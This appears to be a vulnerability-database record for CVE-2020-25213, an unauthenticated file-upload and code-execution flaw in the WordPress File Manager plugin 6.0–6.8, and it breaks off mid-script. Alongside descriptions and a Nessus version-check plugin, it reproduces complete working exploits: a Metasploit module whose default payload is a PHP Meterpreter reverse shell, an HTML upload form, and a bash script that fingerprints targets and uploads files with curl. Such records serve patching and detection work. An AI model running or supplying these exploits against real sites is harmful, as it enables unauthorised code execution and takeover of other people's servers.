MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HTTP::Wordpress \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution', \n'Description' => %q{ \nThe File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and \nexecute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php \nextension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write \nPHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Alex Souza (w4fz5uck5)', # initial discovery and PoC \n'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module \n], \n'References' => \n[ \n[ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ], \n[ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ], \n[ 'CVE', '2020-25213' ] \n], \n'Platform' => [ 'php' ], \n'Privileged' => false, \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n[ \n'WordPress File Manager 6.0-6.8', \n{ \n'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } \n} \n] \n], \n'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020 \n'DefaultTarget' => 0 \n) \n) \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']), \nOptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]]) \n] \n) \nend \n \ndef check \nreturn CheckCode::Unknown unless wordpress_and_online? \n \n# check the plugin version from readme \ncheck_plugin_version_from_readme('wp-file-manager', '6.9', '6.0') \nend \n \ndef exploit \n# base path to File Manager plugin \nfile_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager') \n# filename of the file to be uploaded/created \nfilename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\" \nregister_file_for_cleanup(filename) \n \ncase datastore['COMMAND'] \nwhen 'upload' \nelfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename) \nwhen 'mkfile+put' \nelfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename) \nelfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename) \nend \n \npayload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename) \nprint_status(\"#{peer} - Payload is at #{payload_uri}\") \n# execute the payload \nsend_request_cgi('uri' => normalize_uri(payload_uri)) \nend \n \n# make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods \ndef elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {}) \nfilename = opts['filename'] \n \n# prep for exploit \npost_data = Rex::MIME::Message.new \npost_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"') \n \ncase elfinder_cmd \nwhen 'upload' \npost_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"') \npost_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\") \nwhen 'mkfile' \npost_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"') \npost_data.add_part(filename, nil, nil, 'form-data; name=\"name\"') \nwhen 'put' \npost_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"') \npost_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"') \nend \n \nres = send_request_cgi( \n'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'), \n'method' => 'POST', \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\", \n'data' => post_data.to_s \n) \n \nfail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res \nfail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200 \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/160003/wp_file_manager_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-10-27T22:48:31", "description": "The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\n", "cvss3": {}, "published": "2020-10-10T17:20:28", "type": "metasploit", "title": "WordPress File Manager Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-25213"], "modified": "2021-08-27T16:19:43", "id": "MSF:EXPLOIT-MULTI-HTTP-WP_FILE_MANAGER_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/wp_file_manager_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HTTP::Wordpress\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\n 'Description' => %q{\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\n ],\n 'References' => [\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\n [ 'CVE', '2020-25213' ]\n ],\n 'Platform' => [ 'php' ],\n 'Privileged' => false,\n 'Arch' => ARCH_PHP,\n 'Targets' => [\n [\n 'WordPress File Manager 6.0-6.8',\n {\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\n }\n ]\n ],\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\n 'DefaultTarget' => 0\n )\n )\n register_options(\n [\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\n ]\n )\n end\n\n def check\n return CheckCode::Unknown unless wordpress_and_online?\n\n # check the plugin version from readme\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\n end\n\n def exploit\n # base path to File Manager plugin\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\n # filename of the file to be uploaded/created\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\n register_file_for_cleanup(filename)\n\n case datastore['COMMAND']\n when 'upload'\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\n when 'mkfile+put'\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\n end\n\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\n # execute the payload\n send_request_cgi('uri' => normalize_uri(payload_uri))\n end\n\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\n filename = opts['filename']\n\n # prep for exploit\n post_data = Rex::MIME::Message.new\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\n\n case elfinder_cmd\n when 'upload'\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\n when 'mkfile'\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\n when 'put'\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\n end\n\n res = send_request_cgi(\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\n 'method' => 'POST',\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'data' => post_data.to_s\n )\n\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/wp_file_manager_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "wpexploit": [{"lastseen": "2021-02-15T22:21:15", "description": "Seravo noticed multiple cases where WordPress sites were breached using 0-day in wp-file-manager (confirmed with v6.8, which was the latest version available in wordpress.org). File lib/php/connector.minimal.php can be by default opened directly, and this file loads lib/php/elFinderConnector.class.php which reads POST/GET variables, and then allows executing some internal features, like uploading files. PHP is allowed, thus this leads to unauthenticated arbitrary file upload and remote code execution. It seems that this vulnerability was originally discovered and published publicly on Twitter on August 26th (see references), and was later seen being exploited in the wild by Seravo.\n", "cvss3": {}, "published": "2020-09-01T00:00:00", "type": "wpexploit", "title": "File Manager 6.0-6.9 - Unauthenticated Arbitrary File Upload leading to RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-25213"], "modified": "2020-12-02T14:48:23", "id": "WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9", "href": "", "sourceData": "https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py\r\n\r\n<html>\r\n<body>\r\n <form method=\"POST\" enctype=\"multipart/form-data\" action=\"https://example.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\">\r\n <input type=\"hidden\" name=\"cmd\" value=\"upload\"/>\r\n <input type=\"hidden\" name=\"target\" value=\"l1_Lw\"/>\r\n <input type=\"file\" name=\"upload[]\"/><br/><br/>\r\n <input type=\"submit\" value=\"Upload\"/>\r\n </form>\r\n</body>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in WordPress File Manager plugin\n\nVulnerability Type: File Upload", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-13T00:00:00", "type": "dsquare", "title": "WordPress File Manager < 6.9 File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2021-03-13T00:00:00", "id": "E-722", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T15:20:11", "description": "The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to 6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An unauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php file, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-04T00:00:00", "type": "nessus", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-25213\");\n script_xref(name:\"IAVA\", value:\"2020-A-0425\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0115\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25213\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"WordPress File Manager < 6.9 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WordPress File Manager Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T04:09:11", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-02T00:00:00", "type": "exploitdb", "title": "WordPress Plugin Wp-FileManager 6.8 - RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-25213", "CVE-2020-25213"], "modified": "2020-12-02T00:00:00", "id": "EDB-ID:49178", "href": "https://www.exploit-db.com/exploits/49178", "sourceData": "# Exploit Title: WordPress Plugin Wp-FileManager 6.8 - RCE\r\n# Date: September 4,2020\r\n# Exploit Author: Mansoor R (@time4ster)\r\n# CVE: CVE-2020-25213\r\n# Version Affected: 6.0 to 6.8\r\n# Vendor URL: https://wordpress.org/plugins/wp-file-manager/\r\n# Patch: Upgrade to wp-file-manager 6.9 (or above)\r\n# Tested on: wp-file-manager 6.0 (https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip) on Ubuntu 18.04\r\n\r\n#!/bin/bash\r\n\r\n#Description:\r\n#The core of the issue began with the File Manager plugin renaming the extension on the elFinder library\u2019s connector.minimal.php.dist file to .php so it could be executed directly, even though the connector file was not used by the File Manager itself. Such libraries often include example files that are not intended to be used \u201cas-is\u201d without adding access controls, and this file had no direct access restrictions, meaning the file could be accessed by anyone. This file could be used to initiate an elFinder command and was hooked to the elFinderConnector.class.php file\r\n\r\n#Using connector.minimal.php file attacker can upload arbitrary file to the target (unauthenticated) & thus can achieve Remote code Execution.\r\n\r\n\r\n#Patch commit details:\r\n# https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2373068%40wp-file-manager%2Ftrunk&old=2372895%40wp-file-manager%2Ftrunk&sfp_email=&sfph_mail=\r\n\r\n#Reference\r\n#https://nvd.nist.gov/vuln/detail/CVE-2020-25213\r\n\r\n#Credits:\r\n#1. https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\r\n#2. https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/\r\n\r\n##WARNINGS: \r\n#Only test the exploit on websites you are authorized to.\r\n#Don't upload reverse shell payloads or any files that can cause harm to organization.\r\n#Also note that the uploaded files can be accessed by anyone unless secured by password.\r\n\r\n## Usage:\r\n# ========\r\n# root@Hackintosh:~# ./wp-file-manager-exploit.sh -u http://192.168.1.54/wordpress --check\r\n# \r\n# ============================================================================================\r\n# wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]\r\n# \r\n# By: Mansoor R (@time4ster)\r\n# ============================================================================================\r\n# \r\n# [+] Found wp-file-manager version: 6.0\r\n# [+] Version appears to be vulnerable\r\n# [+] Target: http://192.168.1.54/wordpress is vulnerable\r\n# \r\n# root@Hackintosh:~# ./wp-file-manager-exploit.sh -u http://192.168.1.54/wordpress -f /tmp/mypoc.php --verbose\r\n# \r\n# ============================================================================================\r\n# wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]\r\n# \r\n# By: Mansoor R (@time4ster)\r\n# ============================================================================================\r\n# \r\n# curl POC :\r\n# curl -ks --max-time 5 --user-agent \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36\" -F \"reqid=17457a1fe6959\" -F \"cmd=upload\" -F \"target=l1_Lw\" -F \"mtime[]=1576045135\" -F \"upload[]=@//tmp/mypoc.php\" \"http://192.168.1.54/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\r\n# \r\n# [+] W00t! W00t! File uploaded successfully.\r\n# Location: /wordpress/wp-content/plugins/wp-file-manager/lib/php/../files/mypoc.php\r\n\r\n# Exploit\r\n#==========\r\necho\r\necho \"============================================================================================\"\r\necho \"wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]\"\r\necho\r\necho \"By: Mansoor R (@time4ster)\"\r\necho \"============================================================================================\"\r\necho\r\n\r\nfunction printHelp()\r\n{\r\n\techo -e \"\r\nUsage:\r\n\r\n-u|--wp_url <string>\t\tWordpress target url\r\n-f|--upload_file <string>\t\tAbsolute location of local file to upload on the target. (relative path will not work)\r\n-k|--check\t\t\t\tOnly checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded.\r\n-v|--verbose\t\t\t\tAlso prints curl command which is going to be executed\r\n-h|--help\t\t\t\tPrint Help menu\r\n\r\n\r\nExample:\r\n./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check\r\n./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose\r\n\"\r\n}\r\n\r\ncheck=\"false\"\r\nverbose=\"false\"\r\n#Processing arguments\r\nwhile [[ \"$#\" -gt 0 ]]\r\ndo\r\nkey=\"$1\"\r\n\r\ncase \"$key\" in\r\n -u|--wp_url)\r\n\t wp_url=\"$2\"\r\n\t shift\r\n\t shift # past argument\r\n\t ;;\r\n -f|--upload_file)\r\n\t upload_file=\"$2\"\r\n\t shift\r\n\t shift\r\n\t ;;\r\n -k|--check)\r\n\t check=\"true\"\r\n\t shift\r\n\t shift\r\n\t ;;\r\n -v|--verbose)\r\n\t verbose=\"true\"\r\n\t shift\r\n\t ;;\r\n -h|--help)\r\n\t printHelp\r\n\t exit\r\n\t shift\r\n\t ;;\r\n *) \r\n\t echo [-] Enter valid options\r\n\t exit\r\n\t ;;\r\nesac\r\ndone\r\n\r\n[[ -z \"$wp_url\" ]] && echo \"[-] Supply wordpress target URL.\" && exit \r\n[[ -z \"$upload_file\" ]] && [[ \"$check\" == \"false\" ]] && echo \"[-] Either supply --upload_file or --check\" && exit\r\n[[ -n \"$upload_file\" ]] && [[ ! -s \"$upload_file\" ]] && echo \"[-] File supplied is either empty or not exist.\" && exit\r\n\r\n#Script have dependency on jq\r\njq_cmd=$(command -v jq)\r\n[[ -z \"$jq_cmd\" ]] && echo -e \"[-] Script have dependency on jq. Insall jq from your package manager.\\nFor debian based distro install using command: apt install jq\" && exit\r\n\r\nfunction checkWPFileManagerVersion()\r\n{\t\t\t\t\t\t\t\t\t\t#Takes 1 argument: url\r\n\tdeclare url=\"$1\"\r\n\tdeclare target_endpoint=\"$url/wp-content/plugins/wp-file-manager/readme.txt\"\r\n\tdeclare user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36\"\r\n\tdeclare is_vulnerable=\"true\"\r\n\t#declare response=$(curl -ks --max-time 5 --user-agent \"$user_agent\" \"$target_endpoint\" | grep -i \"Stable tag: \")\r\n\tdeclare version=$( curl -ks --max-time 5 --user-agent \"$user_agent\" \"$target_endpoint\" | grep -A 5 \"== Changelog ==\" | grep -E -o \"[0-9]\\.[0-9]\" | head -n 1 )\r\n\tif [ -n \"$version\" ];then\r\n\t\t#declare version=$(echo \"$response\" | awk {'print $3'})\r\n\t\techo \"[+] Found wp-file-manager version: $version\"\r\n\t\t\r\n\t\tpatched_version=\"6.9\"\r\n\t\t#if [ $(awk 'BEGIN {print ('$version' > '6.9'}') ]; then\r\n\t\tsmaller_version=$(echo -e \"$version\\n$patched_version\" | sort -n | head -n 1)\r\n\t\tif [ \"$version\" != \"$patched_version\" ] && [ \"$smaller_version\" == \"$version\" ];then\r\n\t\t\techo \"[+] Version appears to be vulnerable\"\r\n\t\telse\r\n\t\t\techo \"[-] Version don't appears to be vulnerable\"\r\n\t\t\tis_vulnerable=false\r\n\t\tfi\r\n\telse\techo \"[-] Unable to detect version. May be wp-file-manager plugin not installed.\"\r\n\t\tis_vulnerable=false\r\n\tfi\r\n\tif [ \"$is_vulnerable\" == \"false\" ];\r\n\tthen\r\n\t\techo -n \"Do you still want to continue (y/N) : \"\r\n\t\tread choice\r\n\t\t[[ \"$choice\" == \"y\" ]] || [[ \"$choice\" == \"Y\" ]] && echo && return\r\n\t\texit\t\r\n\tfi\r\n\r\n\r\n}\r\n\r\nfunction checkWPFileManager()\r\n{\t\t\t\t\t\t\t\t\t\t#Takes 1 argument: url\r\n\tdeclare url=\"$1\"\r\n\r\n\t#Checking wp-file-manager plugin version:\r\n\tcheckWPFileManagerVersion \"$url\"\r\n\r\n\tdeclare target_endpoint=\"$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\r\n\tdeclare user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36\"\r\n\t\r\n\tdeclare response=$(curl -ks --max-time 5 --user-agent \"$user_agent\" \"$target_endpoint\")\r\n\t#echo \"$response\"\r\n\t#{\"error\":[\"errUnknownCmd\"]} is returned when vulnerable endpoint is hit\r\n\tdeclare is_vulnerable=$(echo \"$response\" | grep \"\\{\\\"error\\\":\\[\\\"errUnknownCmd\\\"\\]\\}\")\r\n\t[[ -n \"$is_vulnerable\" ]] && echo \"[+] Target: $url is vulnerable\"\r\n\t[[ -z \"$is_vulnerable\" ]] && echo \"[-] Target: $url is not vulnerable\"\t\r\n}\r\n\r\nfunction exploitWPFileManager()\r\n{\t\t\t\t\t\t\t\t\t\t#Takes 3 arguments: url & file_upload & verbose(true/false)\r\n\tdeclare url=\"$1\"\r\n\tdeclare file_upload=\"$2\"\r\n\tdeclare verbose=\"$3\"\r\n\tdeclare target_endpoint=\"$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\r\n\tdeclare user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36\"\r\n\r\n\tif [ \"$verbose\" == \"true\" ];then\r\n\t\techo \"curl POC :\"\r\n\t\techo \"curl -ks --max-time 5 --user-agent \\\"$user_agent\\\" -F \\\"reqid=17457a1fe6959\\\" -F \\\"cmd=upload\\\" -F \\\"target=l1_Lw\\\" -F \\\"mtime[]=1576045135\\\" -F \\\"upload[]=@/$file_upload\\\" \\\"$target_endpoint\\\" \"\r\n\t\techo\r\n\tfi\r\n\r\n\tresponse=$(curl -ks --max-time 5 --user-agent \"$user_agent\" -F \"reqid=17457a1fe6959\" -F \"cmd=upload\" -F \"target=l1_Lw\" -F \"mtime[]=1576045135\" \\\r\n\t\t-F \"upload[]=@/$file_upload\" \\\r\n\t\t\"$target_endpoint\" )\r\n #echo \"$response\"\r\n file_upload_url=$(echo \"$response\" | jq -r .added[0].url 2>/dev/null)\r\n\t[[ -n \"$file_upload_url\" ]] && echo -e \"[+] W00t! W00t! File uploaded successfully.\\nLocation: $file_upload_url \"\r\n\t[[ -z \"$file_upload_url\" ]] && echo \"[-] File upload failed.\"\r\n}\t\r\n\r\n\r\n[[ \"$check\" == \"true\" ]] && checkWPFileManager \"$wp_url\"\r\n[[ -s \"$upload_file\" ]] && exploitWPFileManager \"$wp_url\" 